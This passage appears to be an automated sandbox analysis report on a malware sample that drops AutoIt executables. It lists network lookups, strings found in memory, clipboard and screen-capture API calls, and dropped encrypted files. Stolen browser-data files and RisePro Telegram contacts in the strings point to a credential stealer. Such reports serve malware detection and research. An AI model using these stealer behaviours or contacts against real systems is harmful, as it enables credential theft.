Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=8.46.123.33 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com

Source: global traffic	DNS traffic detected: DNS query: CcUPthUoPgCKIth.CcUPthUoPgCKIth
Source: global traffic	DNS traffic detected: DNS query: ipinfo.io
Source: global traffic	DNS traffic detected: DNS query: db-ip.com

Source: External24.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: External24.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: External24.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: External24.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Lawyers.pif, 0000000A.00000003.1678028298.00000000048B7000.00000004.00000800.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000002.3501773338.0000000002AB2000.00000004.00000020.00020000.00000000.sdmp, PixelFlow.pif.10.dr, Lawyers.pif.1.dr, Camp.0.dr	String found in binary or memory: http://crl.globalsign.com/gs/gscodesigng2.crl0
Source: Lawyers.pif, 0000000A.00000003.1678028298.00000000048B7000.00000004.00000800.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000002.3501773338.0000000002AB2000.00000004.00000020.00020000.00000000.sdmp, PixelFlow.pif.10.dr, Lawyers.pif.1.dr, Camp.0.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingg2.crl0T
Source: Lawyers.pif, 0000000A.00000003.1678028298.00000000048B7000.00000004.00000800.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000002.3501773338.0000000002AB2000.00000004.00000020.00020000.00000000.sdmp, PixelFlow.pif.10.dr, Lawyers.pif.1.dr, Camp.0.dr	String found in binary or memory: http://crl.globalsign.net/root.crl0
Source: External24.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: External24.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: External24.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: External24.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: External24.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: External24.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: External24.exe	String found in binary or memory: http://ocsp.digicert.com0
Source: External24.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: External24.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: External24.exe	String found in binary or memory: http://ocsp.digicert.com0X
Source: Lawyers.pif, 0000000A.00000003.1678028298.00000000048B7000.00000004.00000800.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000002.3501773338.0000000002AB2000.00000004.00000020.00020000.00000000.sdmp, PixelFlow.pif.10.dr, Lawyers.pif.1.dr, Camp.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesigng20
Source: Lawyers.pif, 0000000A.00000003.1678028298.00000000048B7000.00000004.00000800.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000002.3501773338.0000000002AB2000.00000004.00000020.00020000.00000000.sdmp, PixelFlow.pif.10.dr, Lawyers.pif.1.dr, Camp.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesigng2.crt04
Source: Lawyers.pif, 0000000A.00000003.1678028298.00000000048B7000.00000004.00000800.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000002.3501773338.0000000002AB2000.00000004.00000020.00020000.00000000.sdmp, PixelFlow.pif.10.dr, Lawyers.pif.1.dr, Camp.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingg2.crt0
Source: Lawyers.pif, 0000000A.00000003.1678028298.00000000048B7000.00000004.00000800.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000002.3501773338.0000000002AB2000.00000004.00000020.00020000.00000000.sdmp, PixelFlow.pif.10.dr, Lawyers.pif.1.dr, Camp.0.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/0
Source: Lawyers.pif, 0000000A.00000003.1678028298.00000000048B7000.00000004.00000800.00020000.00000000.sdmp, Lawyers.pif, 0000000A.00000000.1667514341.0000000000728000.00000002.00000001.01000000.00000005.sdmp, PixelFlow.pif, 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmp, Lawyers.pif, 00000015.00000000.2875071248.0000000000728000.00000002.00000001.01000000.00000005.sdmp, Lawyers.pif, 00000015.00000002.3501773338.0000000002AB2000.00000004.00000020.00020000.00000000.sdmp, PixelFlow.pif.10.dr, Lawyers.pif.1.dr, Ivory.0.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: External24.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: Lawyers.pif, Lawyers.pif, 00000015.00000002.3501008072.0000000000B50000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.winimage.com/zLibDll
Source: Lawyers.pif, 00000015.00000003.3019900839.000000000618E000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3018511190.000000000616D000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3021958870.000000000619A000.00000004.00000020.00020000.00000000.sdmp, 0ffAoFEXM0xBWeb Data.21.dr, IXuJ06djpYzdWeb Data.21.dr, Z7Yuxtpi7pUyWeb Data.21.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Lawyers.pif, 00000015.00000003.3019900839.000000000618E000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3018511190.000000000616D000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3021958870.000000000619A000.00000004.00000020.00020000.00000000.sdmp, 0ffAoFEXM0xBWeb Data.21.dr, IXuJ06djpYzdWeb Data.21.dr, Z7Yuxtpi7pUyWeb Data.21.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Lawyers.pif, 00000015.00000003.3019900839.000000000618E000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3018511190.000000000616D000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3021958870.000000000619A000.00000004.00000020.00020000.00000000.sdmp, 0ffAoFEXM0xBWeb Data.21.dr, IXuJ06djpYzdWeb Data.21.dr, Z7Yuxtpi7pUyWeb Data.21.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Lawyers.pif, 00000015.00000003.3019900839.000000000618E000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3018511190.000000000616D000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3021958870.000000000619A000.00000004.00000020.00020000.00000000.sdmp, 0ffAoFEXM0xBWeb Data.21.dr, IXuJ06djpYzdWeb Data.21.dr, Z7Yuxtpi7pUyWeb Data.21.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Lawyers.pif, 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://db-ip.com/
Source: Lawyers.pif, 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://db-ip.com/demo/home.php?s=8.46.123.33
Source: Lawyers.pif, 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://db-ip.com/demo/home.php?s=8.46.123.33a
Source: Lawyers.pif, 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://db-ip.com/demo/home.php?s=8.46.123.33tQ0
Source: Lawyers.pif, 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://db-ip.com:443/demo/home.php?s=8.46.123.33j
Source: Lawyers.pif, 00000015.00000003.3019900839.000000000618E000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3018511190.000000000616D000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3021958870.000000000619A000.00000004.00000020.00020000.00000000.sdmp, 0ffAoFEXM0xBWeb Data.21.dr, IXuJ06djpYzdWeb Data.21.dr, Z7Yuxtpi7pUyWeb Data.21.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Lawyers.pif, 00000015.00000003.3019900839.000000000618E000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3018511190.000000000616D000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3021958870.000000000619A000.00000004.00000020.00020000.00000000.sdmp, 0ffAoFEXM0xBWeb Data.21.dr, IXuJ06djpYzdWeb Data.21.dr, Z7Yuxtpi7pUyWeb Data.21.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Lawyers.pif, 00000015.00000003.3019900839.000000000618E000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3018511190.000000000616D000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3021958870.000000000619A000.00000004.00000020.00020000.00000000.sdmp, 0ffAoFEXM0xBWeb Data.21.dr, IXuJ06djpYzdWeb Data.21.dr, Z7Yuxtpi7pUyWeb Data.21.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Lawyers.pif, Lawyers.pif, 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3349195349.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000002.3501287006.0000000000EEB000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000002.3501287006.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000002.3501596780.0000000000F20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/
Source: Lawyers.pif, 00000015.00000003.3349195349.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000002.3501596780.0000000000F20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/Mozilla/5.0
Source: Lawyers.pif, 00000015.00000002.3501008072.0000000000B50000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll
Source: Lawyers.pif, 00000015.00000002.3501287006.0000000000EEB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/t
Source: Lawyers.pif, 00000015.00000002.3501287006.0000000000ED0000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000002.3501287006.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/widget/demo/8.46.123.33
Source: Lawyers.pif, 00000015.00000003.3349195349.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000002.3501596780.0000000000F20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io:443/widget/demo/8.46.123.33
Source: D87fZN3R3jFeplaces.sqlite.21.dr	String found in binary or memory: https://support.mozilla.org
Source: D87fZN3R3jFeplaces.sqlite.21.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: D87fZN3R3jFeplaces.sqlite.21.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: Lawyers.pif, 00000015.00000003.3018791915.000000000616A000.00000004.00000020.00020000.00000000.sdmp, lsqPckitCOdaHistory.21.dr, ZriO6tn8Siv1History.21.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: lsqPckitCOdaHistory.21.dr, ZriO6tn8Siv1History.21.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: Lawyers.pif, 00000015.00000003.3018791915.000000000616A000.00000004.00000020.00020000.00000000.sdmp, lsqPckitCOdaHistory.21.dr, ZriO6tn8Siv1History.21.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: lsqPckitCOdaHistory.21.dr, ZriO6tn8Siv1History.21.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: Lawyers.pif, 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000002.3501287006.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, 7yC9aM3nOPMh37Qvw5GmIXM.zip.21.dr	String found in binary or memory: https://t.me/RiseProSUPPORT
Source: Lawyers.pif, 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, passwords.txt.21.dr	String found in binary or memory: https://t.me/risepro_bot
Source: Lawyers.pif, 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/risepro_bot33203
Source: Lawyers.pif, 00000015.00000003.3019900839.000000000618E000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3018511190.000000000616D000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3021958870.000000000619A000.00000004.00000020.00020000.00000000.sdmp, 0ffAoFEXM0xBWeb Data.21.dr, IXuJ06djpYzdWeb Data.21.dr, Z7Yuxtpi7pUyWeb Data.21.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Lawyers.pif, 0000000A.00000003.1678028298.00000000048B7000.00000004.00000800.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000002.3501773338.0000000002AB2000.00000004.00000020.00020000.00000000.sdmp, PixelFlow.pif.10.dr, Lawyers.pif.1.dr, Camp.0.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: Lawyers.pif, 0000000A.00000003.1678028298.00000000048B7000.00000004.00000800.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000002.3501773338.0000000002AB2000.00000004.00000020.00020000.00000000.sdmp, PixelFlow.pif.10.dr, Lawyers.pif.1.dr, Camp.0.dr	String found in binary or memory: https://www.globalsign.com/repository/03
Source: Lawyers.pif, 00000015.00000003.3019900839.000000000618E000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3018511190.000000000616D000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3021958870.000000000619A000.00000004.00000020.00020000.00000000.sdmp, 0ffAoFEXM0xBWeb Data.21.dr, IXuJ06djpYzdWeb Data.21.dr, Z7Yuxtpi7pUyWeb Data.21.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Lawyers.pif	String found in binary or memory: https://www.maxmind.com/en/locate-my-ip-address
Source: D87fZN3R3jFeplaces.sqlite.21.dr	String found in binary or memory: https://www.mozilla.org
Source: D87fZN3R3jFeplaces.sqlite.21.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: D87fZN3R3jFeplaces.sqlite.21.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: Lawyers.pif, 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, History.txt.21.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: Lawyers.pif, 00000015.00000002.3502181741.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3018990250.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3020594535.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3021409514.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3022662035.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3020835160.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3017414060.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3018332936.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3023598157.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3020119374.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3019672520.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3020391892.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3017934761.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3022341285.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3017683304.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3021852441.0000000006154000.00000004.00000020.00020000.00000000.sdmp, 3b6N2Xdh3CYwplaces.sqlite.21.dr, D87fZN3R3jFeplaces.sqlite.21.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Lawyers.pif, 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/d
Source: D87fZN3R3jFeplaces.sqlite.21.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Lawyers.pif, 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, History.txt.21.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: Lawyers.pif, 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/allets
Source: Lawyers.pif, 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/e
Source: Lawyers.pif, 00000015.00000002.3502181741.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3018990250.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3020594535.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3021409514.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3022662035.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3020835160.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3017414060.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3018332936.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3023598157.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3020119374.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3019672520.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3020391892.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3017934761.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3022341285.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3017683304.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3021852441.0000000006154000.00000004.00000020.00020000.00000000.sdmp, 3b6N2Xdh3CYwplaces.sqlite.21.dr, D87fZN3R3jFeplaces.sqlite.21.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: Lawyers.pif, 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/refoxm

Source: unknown	Network traffic detected: HTTP traffic on port 55334 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55335 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55334
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55335

Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:55334 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.4:55335 version: TLS 1.2

Source: C:\Users\user\Desktop\External24.exe

Code function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004050F9

Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_00674614 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		15_2_00674614
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006D4614 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		21_2_006D4614

Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif

Code function: 15_2_00674416 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

15_2_00674416

Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif

Code function: 21_2_00C35FF0 GdiplusStartup,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,DeleteObject,GdipDisposeImage,DeleteObject,ReleaseDC,GdiplusShutdown,

21_2_00C35FF0

Source: C:\Users\user\Desktop\External24.exe

Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004044D1

Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0068CEDF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		15_2_0068CEDF
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006ECEDF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		21_2_006ECEDF

Spam, unwanted Advertisements and Ransom Demands

Writes many files with high entropy

Source: C:\Users\user\Desktop\External24.exe	File created: C:\Users\user\AppData\Local\Temp\Appearance entropy: 7.99802716721	Jump to dropped file
Source: C:\Users\user\Desktop\External24.exe	File created: C:\Users\user\AppData\Local\Temp\Therefore entropy: 7.99865168987	Jump to dropped file
Source: C:\Users\user\Desktop\External24.exe	File created: C:\Users\user\AppData\Local\Temp\Sharon entropy: 7.99552725011	Jump to dropped file
Source: C:\Users\user\Desktop\External24.exe	File created: C:\Users\user\AppData\Local\Temp\Anytime entropy: 7.99825278262	Jump to dropped file
Source: C:\Users\user\Desktop\External24.exe	File created: C:\Users\user\AppData\Local\Temp\Warming entropy: 7.99906740598	Jump to dropped file
Source: C:\Users\user\Desktop\External24.exe	File created: C:\Users\user\AppData\Local\Temp\Inspections entropy: 7.99494180936	Jump to dropped file
Source: C:\Users\user\Desktop\External24.exe	File created: C:\Users\user\AppData\Local\Temp\Physical entropy: 7.99885717625	Jump to dropped file
Source: C:\Users\user\Desktop\External24.exe	File created: C:\Users\user\AppData\Local\Temp\Helena entropy: 7.99326270642	Jump to dropped file
Source: C:\Users\user\Desktop\External24.exe	File created: C:\Users\user\AppData\Local\Temp\Lung entropy: 7.99793600042	Jump to dropped file
Source: C:\Users\user\Desktop\External24.exe	File created: C:\Users\user\AppData\Local\Temp\Zoning entropy: 7.99764197142	Jump to dropped file
Source: C:\Users\user\Desktop\External24.exe	File created: C:\Users\user\AppData\Local\Temp\Accidents entropy: 7.99887666637	Jump to dropped file
Source: C:\Users\user\Desktop\External24.exe	File created: C:\Users\user\AppData\Local\Temp\Latinas entropy: 7.99845945803	Jump to dropped file
Source: C:\Users\user\Desktop\External24.exe	File created: C:\Users\user\AppData\Local\Temp\Inflation entropy: 7.99886160045	Jump to dropped file
Source: C:\Users\user\Desktop\External24.exe	File created: C:\Users\user\AppData\Local\Temp\Wiley entropy: 7.99864940107	Jump to dropped file
Source: C:\Users\user\Desktop\External24.exe	File created: C:\Users\user\AppData\Local\Temp\Cincinnati entropy: 7.99899755257	Jump to dropped file
Source: C:\Users\user\Desktop\External24.exe	File created: C:\Users\user\AppData\Local\Temp\Army entropy: 7.99828016887	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\292668\r entropy: 7.99988284324	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File created: C:\Users\user\AppData\Local\PixelFlow Creations\m entropy: 7.99988284324	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File created: C:\Users\user\AppData\Local\Temp\7yC9aM3nOPMh37Qvw5GmIXM.zip entropy: 7.99792293497	Jump to dropped file

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

